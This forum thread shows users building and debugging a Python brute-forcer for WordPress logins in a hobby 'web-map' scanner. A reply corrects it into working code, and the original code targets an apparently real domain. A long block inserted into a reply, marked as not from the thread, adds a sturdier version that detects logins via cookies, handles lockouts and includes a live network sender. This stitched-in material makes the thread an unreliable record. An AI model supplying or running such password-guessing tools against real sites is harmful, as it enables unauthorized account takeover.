Need some help on my project.

L00PeR
7 years ago

0

Hi! :)
I've been writing a program called web-map.
It scans a website for vulnerabilities.
But I'm having some trouble with brute-forcing the WordPress login.
This is the code which brute-forces the login:
```python
import requests


def brute_login(tgt, dictionary):
    s = requests.Session()
    pass_found = False

    user = raw_input("User: ")
    intent = 0
    tgt = tgt + "/wp-login"
    f = open(dictionary, 'r')
    for word in f.readlines():
        password = word.strip('\n')
        intent += 1
        payload = {'log': user, 'pwd': password, 'redirect_to': 'TARGET_URL/wp-admin', 'testcookie': '1', 'wp-submit': 'Access'}
        print '[+] Trying with user: ' + str(user) + ' and password: ' + str(password) + '\ttry: ' + str(intent)
        s.post(tgt, data=payload)
        # Fetch the dashboard and look for its title (Spanish or English) to tell whether we are logged in
        data = s.get("http://gerion.info/wp-admin").text
        if 'Escritorio' in data or 'Desktop' in data:
            print '[*] Password found: ' + password
            pass_found = True
        else:
            pass
```

I hope you can help me, Thanks!! :D

6 replies, 2 voices, 220 views
L00PeR
7 years ago

0

You can see the whole code on https://github.com/xVL00PeR/web-map

Smyler [WHGhost]
7 years ago

1

Instead of doing the GET request to know if you got connected, why don't you just check the response to your POST request? That would be much faster.

I don't know WordPress, but maybe it is blocking you after a few attempts. Your code looks fine without testing it.

L00PeR
7 years ago | edited 7 years ago

0

I don't think WordPress is blocking me because I have tried doing only one request with the correct credentials and I still cannot log in.
And how could I check the response to the POST with Python?

Smyler [WHGhost]
7 years ago

0

`session.post` returns a response object, just like `session.get`, so you can change
```python
s.post(tgt, data=payload)
data = s.get("http://gerion.info/wp-admin").text
```
with
```python
data = s.post(tgt, data=payload).text
```
and test the content of `data`.

Smyler [WHGhost]
7 years ago | edited 7 years ago

0

Ok, I tested your code, found what was wrong, and changed some things (for Python 3 support and cleaner code).

So this works well:
```python
import requests

try:                      # raw_input only exists on Python 2; Python 3 calls it input()
    input = raw_input
except NameError:
    pass


def brute_login(tgt, dictionary):

    s = requests.Session()

    # Let WordPress set its cookies, instead of manually setting them.
    s.get(tgt)

    user = input("User: ")
    intent = 0
    tgt = tgt + "/wp-login.php"

    # We use a context manager, so that the file is closed.
    # splitlines() does not leave an empty entry after the final newline.
    with open(dictionary, 'r') as f:
        passwords = f.read().splitlines()

    for password in passwords:
        intent += 1
        payload = {
            'log': user,
            'pwd': password}
        print('[+] Trying with user: {} and password: {}\ttry: {}'.format(
            user,
            password,
            intent))  # Python 3 compatibility

        # We use the response object from the post request.
        data = s.post(tgt, data=payload)

        # It's easier to check if we failed: a wrong password re-renders the form with an error box.
        if 'ERROR' not in data.text:
            print('[*] Password found: {}'.format(password))
            break  # Cleaner than else: pass
```

I added comments, but if you need explanation, feel free to ask.

I am still learning python, so if anyone else finds something wrong with the above function, I will be happy to learn!
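
The function above and the earlier advice to test the POST response instead of fetching wp-admin afterwards both hinge on how you decide that a login worked. Matching "Escritorio"/"Desktop" depends on the dashboard's language, and matching "ERROR" depends on the exact wording of the error box, which has changed between WordPress versions. A signal that does not change is the `wordpress_logged_in_*` cookie WordPress sets on a successful `wp_signon`. The example below is added here and is not code from the thread or from the web-map project: it reads the verdict off the POST response, uses that cookie as the success check, stops on a lockout response, and keeps the network call behind an injected `send` function so the logic runs offline. `fake_wordpress` is a constructed stand-in, not captured traffic; the target URL, user name, wordlist path and the "too many failed" lockout wording are assumptions. Only run the live path against a site you are authorized to test.

```python
# Added example (not the thread's code). Verdict comes from the POST response;
# I/O goes through an injected send(url, data) so the logic is testable offline.
from dataclasses import dataclass, field

@dataclass
class LoginResponse:
    """The parts of an HTTP response the success check looks at."""
    status: int
    url: str                                      # final URL after redirects
    body: str
    cookies: list = field(default_factory=list)   # cookie names now in the jar

def login_url(base_url):
    """The form lives at /wp-login.php; plain /wp-login (the first attempt in the thread) is not it."""
    return base_url.rstrip("/") + "/wp-login.php"

def login_payload(base_url, user, password):
    """The fields the real form posts: log, pwd, wp-submit, redirect_to, testcookie."""
    return {
        "log": user,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": base_url.rstrip("/") + "/wp-admin/",
        "testcookie": "1",
    }

def classify(resp):
    """Read the verdict off the POST response without depending on UI language.

    success: WordPress set a wordpress_logged_in_* cookie (or we landed on wp-admin)
    locked:  HTTP 429, or a lockout message (assumed wording of limit-login plugins)
    failure: the form came back with its <div id="login_error"> box
    """
    if any(name.startswith("wordpress_logged_in_") for name in resp.cookies):
        return "success"
    if resp.status == 200 and "/wp-admin" in resp.url and "login_error" not in resp.body:
        return "success"
    if resp.status == 429 or "too many failed" in resp.body.lower():
        return "locked"
    if 'id="login_error"' in resp.body:
        return "failure"
    return "unknown"

def brute_login(send, base_url, user, passwords, stop_when_locked=True):
    """Try each password; send(url, data) does the POST and returns a LoginResponse.

    Returns (password_or_None, attempts, verdict). Stops on the first hit and,
    by default, on lockout, since further attempts would only be rejected anyway.
    """
    url = login_url(base_url)
    attempts = 0
    for password in passwords:
        attempts += 1
        verdict = classify(send(url, login_payload(base_url, user, password)))
        if verdict == "success":
            return password, attempts, verdict
        if verdict == "locked" and stop_when_locked:
            return None, attempts, verdict
    return None, attempts, "exhausted"

def read_wordlist(path):
    """splitlines() avoids the empty trailing entry that split('\\n') leaves behind."""
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        return [line for line in f.read().splitlines() if line]

def make_requests_sender(base_url):
    """Bind send() to a real requests.Session (imported lazily: offline use needs no network)."""
    import requests

    s = requests.Session()
    s.get(login_url(base_url), timeout=10)  # lets WordPress set wordpress_test_cookie first

    def send(url, data):
        r = s.post(url, data=data, timeout=10)
        return LoginResponse(r.status_code, r.url, r.text, [c.name for c in s.cookies])
    return send

def fake_wordpress(url, data):
    """Constructed stand-in for a site (not real traffic): only 'correct horse' logs in.
    The failure page says 'Error:' rather than 'ERROR', as newer WordPress does."""
    if data["pwd"] == "correct horse":
        return LoginResponse(200, "https://example.test/wp-admin/", "<html>Dashboard</html>",
                             ["wordpress_test_cookie", "wordpress_logged_in_ab12"])
    return LoginResponse(200, url, '<div id="login_error"><strong>Error:</strong> wrong</div>',
                         ["wordpress_test_cookie"])

def demo_offline():
    """Run the loop against fake_wordpress with a tiny constructed wordlist."""
    return brute_login(fake_wordpress, "https://example.test/", "admin",
                       ["123456", "password", "correct horse", "qwerty"])
    # returns ('correct horse', 3, 'success')
```

For a live run, swap the stand-in for the real sender: `brute_login(make_requests_sender(base), base, "admin", read_wordlist("words.txt"))`, with `base` set to the site's URL. The `classify` function is where a target's quirks go: a lockout plugin that answers with a different message, or a site that redirects failed logins, only needs that one function changed, not the loop.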

L00PeR
7 years ago

0

Ok, thanks, that will help me.
I suggest you use Python 2.7; I think it is better than 3.x.
And... do you have a GitHub account? Just so I can note in the code that you helped create it...
